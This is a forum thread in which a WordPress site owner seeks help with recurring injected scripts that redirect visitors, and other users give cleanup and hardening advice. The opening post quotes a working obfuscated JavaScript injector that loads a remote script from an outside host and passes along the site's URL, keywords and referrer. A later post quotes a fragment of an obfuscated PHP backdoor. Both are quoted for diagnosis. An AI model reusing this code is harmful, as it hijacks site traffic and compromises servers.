![]() |
Scripts inserted in my WP themes header
somehow some scripts are placed in my them header that contain malware and redirect traffic to other sites
I changed themes 3 times, got hosting scan the malaware, which they did and delet, but it happens every day. It points to different sites. some were adult dating sites. below a sample. How can I get rid of these things? it has costed memoney to fix some stuff and also lost over half of my traffic <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script> |
Quote:
Without accuse any company you should look into this too. |
I would suggest:
Check out these links on making Wordpress more secure: https://codex.wordpress.org/Hardening_WordPress Securing WordPress: Hardening Basics | The State of Security https://www.wordfence.com/learn/how-...rdpress-sites/ |
Thanks. everything started when I used an ad networks script months ago, then stopped, then cleaned the whole site, but it has been returning many many times
All plugins are from WP repository. The problem is that the issue happens every day or every two days so running without a plug in per day test may end like next year and still it may harm the website. the 3 admins are me and the developers I had to hire to fix the issue. no one else has logged in to the site as admin in the past weeks is there a way to block scripts? |
Can you check on your Jetpact stats and tell me if you see outbound click going to url like this : 01.wp.com etc ... if anything look similar?
Many think those are legit outbound but THEY ARE NOT. :) i mean we have discover Hacked file with the above URL or similar. Also check webmaster/ tools USER owner property. if anyone new have been added as owner. Been hacked this way before. |
Quote:
|
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid.. :winkwink:
|
Quote:
|
Quote:
At this point if your tech can't fix it try another one mate. Or worst case change Theme. :thumbsup Good Luck and keep us posted :) |
Quote:
Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri. Hope this helps. |
Colmike your link is VIrusssssssssssss
DONT CLICK THIS LINK see bellow why https://s16.postimg.org/qz1f1s991/Untitled.jpg |
Quote:
|
ok thanks.. will let you know if something of this works out
|
We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.
We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe. They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server. |
Quote:
|
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
|
That's what you get not keeping software up to date, op.
|
You probably already have tried some malware plugins - but if you havent tried this one I would give it a go: https://wordpress.org/plugins/gotmls/
|
thanks guys and tahnsk for the recommendations.
a i am not tech savy and the person helping me is MIA i tried to find the issue myself what is the dirs.php file supposed to do? i think that is one of the issues. it has crap like this one ${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content))); |
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png |
Quote:
If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised. I would suggest trying this, in this order:
If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server. |
Quote:
There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape. |
Quote:
I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0" If you want to fix this error. You may want to look for your hack though. Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated. Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password? I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try. |
ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.
https://aw-snap.info/file-viewer/ I found this online website scanning tool very helpful This is a terrible, terrible thing :( Good luck getting it fixed |
Thanks to everybody!
Yes it has been hitting me for months and it looked normal for a while. my traffic has gone to 1/3 now |
Quote:
|
Quote:
|
Quote:
I have my part of problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours :mad: grrrrr. At least you know where the problem come from, i suggest you to TAKE Big action to wipe it out. |
Quote:
|
Quote:
One thing you might wanna do is to search your Wordpress database(s)for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in. |
Quote:
|
seems it is finally solved. thanks to you all!
|
oh it's never solved :(
|
so how did you fix it ? :)
Quote:
|
They may likely made many backdoor shells. Beat bet is to format, then import only posts from old database on fresh install.
|
Back up only post content and images. nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.
|
Quote:
|
Quote:
You need format HDD and do a clean OS install. Other than this, nothing will help. |
Quote:
|
Quote:
I actually never downloaded any plugin or script from BHW. i remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was coincidence |
Basics....
https://ithemes.com/2016/10/13/how-t...ly-and-easily/ Good plugin... https://wordpress.org/plugins/all-in...-and-firewall/ If that doesn't do it could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare more popular and a good CDN but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan. :2 cents: |
It is possible to clean out a hacked Wordpress setup and indeed I have done it.
One thing that may help you is this: find /pathtoyourfiles/yourblog.com -mtime -2 -ls It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server. If the attacker is using your site to send spam emails it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going, one is the actual backdoor that allows him to place files on your server, the other are the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days and once you can wrap your head around what they are trying to so it's a lot easier to prevent it. It can also help if you use something like wordfence which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes. |
thank you! I hope all this also helps somebody else who may have similar issues in the future
|
Quote:
We had spend 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS. P.S. they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages. |
All times are GMT -7. The time now is 04:27 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123